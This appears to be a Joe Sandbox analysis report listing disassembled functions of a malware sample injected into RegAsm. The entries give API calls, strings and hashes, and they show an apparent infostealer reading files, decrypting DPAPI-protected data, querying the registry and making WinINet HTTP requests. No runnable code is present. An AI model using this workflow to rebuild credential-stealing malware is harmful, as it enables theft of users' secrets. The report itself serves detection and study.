Opcode ID: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction ID: 3858def785d9e4baa448147c13a215b95796b3cfcd3afa1d1fab1a2876bbce8c
Opcode Fuzzy Hash: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction Fuzzy Hash: A3F09675A40118ABE7149BA4EC1AFFE77ADEB01701F500119F706D72C0DBB89C4587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406E40 Relevance: 9.1, APIs: 6, Instructions: 80filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
LocalFree.KERNEL32(?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE1
CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction ID: fca360b4b4926ce2ce86bd9a704f617748b4363ecef1e2cd769cd9a162bdc231
Opcode Fuzzy Hash: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction Fuzzy Hash: 0F214CB560020AAFDB10DFA4DC84FAF77A9EB49714F10022AF912A72C0D7389D51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407240 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

GetEnvironmentVariableA.KERNEL32(0145F6F0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,00000000,01461F20,?,00427A64,?,?,01462100,01462100,00427A5F,?), ref: 00407311

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

SetEnvironmentVariableA.KERNEL32(0145F6F0,00000000,00000000,hzB,?,?,00427A68,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00427A63), ref: 0040738E
LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00420658,000000FF,?,0040BE2B), ref: 004073A9

Strings

hzB, xrefs: 00407349, 00407366, 0040734D
C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040730B, 00407324

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$hzB
API String ID: 2929475105-4148362473
Opcode ID: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction ID: 579015a8dc8e7fb9ba4dc0b4b2d1472570f0f46b00a7972d46a8666dc34995d3
Opcode Fuzzy Hash: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction Fuzzy Hash: DC71E570900249DEDB04EBE4D846BEEBBB9AF1A304F14417EF905672D1DF781A48C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00415650 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

fA, xrefs: 004156F1, 004157B3, 004156F4
fA, xrefs: 004157CA

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID: fA$fA
API String ID: 4198075804-1630953348
Opcode ID: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction ID: 4a7e4500b8fefa130c25cbd9421f046c1ba1e46fcba1c1cc5636780b9c3006f8
Opcode Fuzzy Hash: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction Fuzzy Hash: 40412D74801249EADB11EFA5C981BDDBBB4AB19304F50407EE906676C2DF781A4CCBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410F40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 00410200: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
Part of subcall function 00410200: HeapAlloc.KERNEL32(00000000), ref: 0041021C
Part of subcall function 00410200: RegOpenKeyExA.KERNEL32(80000002,0145A700,00000000,00020119,?), ref: 0041023B
Part of subcall function 00410200: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

RegOpenKeyExA.KERNEL32(80000002,0145A700,00000000,00020119,00000000), ref: 00410F91
RegQueryValueExA.KERNEL32(00000000,01461E78,00000000,00000000,00000000,000000FF), ref: 00410FAC

Strings

Windows 11, xrefs: 00410F70

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction ID: 53ce30e9246303524b4cf8f670f0acc819984a5071f51573bc99cb0a8d9a2c5a
Opcode Fuzzy Hash: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction Fuzzy Hash: C701267860020AFBD714DBA0EC4EEABB7BDEB45B01F104159FA04D7250D6B45D80C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00410200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
HeapAlloc.KERNEL32(00000000), ref: 0041021C
RegOpenKeyExA.KERNEL32(80000002,0145A700,00000000,00020119,?), ref: 0041023B
RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

Strings

CurrentBuildNumber, xrefs: 0041024F

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction ID: 4c14057a90075943bc9431615e63d58b06497ca245fa930b3837fb80e640c4dc
Opcode Fuzzy Hash: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction Fuzzy Hash: 4AF0AFB9540205BBE7109BA0EC4EFABBBADEF49B01F500155FA0596280E6B45A44C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00417F00 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 660networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452840), ref: 00418CC5
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,014529E0), ref: 00418CDD
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145D9C0), ref: 00418CF6
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DBA0), ref: 00418D0E
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA08), ref: 00418D26
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA38), ref: 00418D3F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01453A38), ref: 00418D57
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA50), ref: 00418D6F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DB40), ref: 00418D88
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DB28), ref: 00418DA0
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA68), ref: 00418DB8
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452A60), ref: 00418DD1
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452AE0), ref: 00418DE9
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452900), ref: 00418E01
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452920), ref: 00418E1A
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DB70), ref: 00418E32

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181D6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181F0

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

Part of subcall function 00404490: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
Part of subcall function 00404490: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 00412870: StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
Part of subcall function 00412870: ExitProcess.KERNEL32 ref: 004128B3

Part of subcall function 00405C90: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
Part of subcall function 00405C90: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 004122F0: strtok_s.MSVCRT ref: 00412330

Sleep.KERNEL32(000003E8), ref: 004185E9

Part of subcall function 00405C90: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04

Part of subcall function 00413930: strtok_s.MSVCRT ref: 0041396C
Part of subcall function 00413930: strtok_s.MSVCRT ref: 004139AE

Part of subcall function 00411DF0: memset.MSVCRT ref: 00411E2B

Part of subcall function 00405C90: HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405F44
Part of subcall function 00405C90: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Strings

%, xrefs: 0041881A

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepSystemTimeVolumeWindowsmemset
String ID: %
API String ID: 3292282700-2567322570
Opcode ID: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction ID: a80d5cc082a79b13c4afddcc74089088984bc40af4cfd8f7e2f84988951bca03
Opcode Fuzzy Hash: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction Fuzzy Hash: E9428F70D10358EADF10EBA5C946BDDBBB4AF19308F5041AEF54573282DB781B48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004171B0 Relevance: 7.6, APIs: 5, Instructions: 148registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004171F1
RegOpenKeyExA.KERNEL32(80000001,014615B8,00000000,00020119,00422FC0), ref: 00417210
RegQueryValueExA.ADVAPI32(00422FC0,01462F30,00000000,00000000,?,000000FF), ref: 00417234
lstrcat.KERNEL32(?,?), ref: 00417263
lstrcat.KERNEL32(?,01462D68), ref: 00417277

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValuememset
String ID:
API String ID: 558315959-0
Opcode ID: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction ID: 74d8b735119c2182752737772a63e4f349c5be27bf2cba7256ea7a55185fa83a
Opcode Fuzzy Hash: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction Fuzzy Hash: 8F51E370940208ABCB18EFA0CC46FEE7779AB49704F10855EF61967281DB746A89CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00410FF0 Relevance: 7.6, APIs: 5, Instructions: 70commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
SysAllocString.OLEAUT32(?), ref: 0041101C
_wtoi64.MSVCRT ref: 00411062
SysFreeString.OLEAUT32(?), ref: 00411078
SysFreeString.OLEAUT32(00000000), ref: 0041107B

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction ID: 0243a214321a8e11e6d6ada038f83521d736f052b3ccf67aedd98e01bceb802f
Opcode Fuzzy Hash: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction Fuzzy Hash: 72117275B00118AFC710DFA9CC84DAA7BB9EFC9344B1481AAE605C7320DA35EE81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 19C4FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 19C4FE03

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 19C4FE78
winRead, xrefs: 19C4FE3D

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: e543d74b8fb931c68ca5a29232e78762216564ebc7b6e966533045c9b170b84a
Instruction ID: 9a458eab5013231c9b3d4dec374e186d291a1774fe0fdc1b9e350a105b018e70
Opcode Fuzzy Hash: e543d74b8fb931c68ca5a29232e78762216564ebc7b6e966533045c9b170b84a
Instruction Fuzzy Hash: E6412772B043466BD300DE64ED8596BB7E8FF84350FA8192DF985C3640D731E91887A2

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF50 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,01462058,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB

Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

memcmp.MSVCRT ref: 0040CFF9

Part of subcall function 00406F90: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
Part of subcall function 00406F90: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
Part of subcall function 00406F90: LocalFree.KERNEL32(?), ref: 00406FEE

Strings

, xrefs: 0040D024
DPAPI, xrefs: 0040CFF3

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
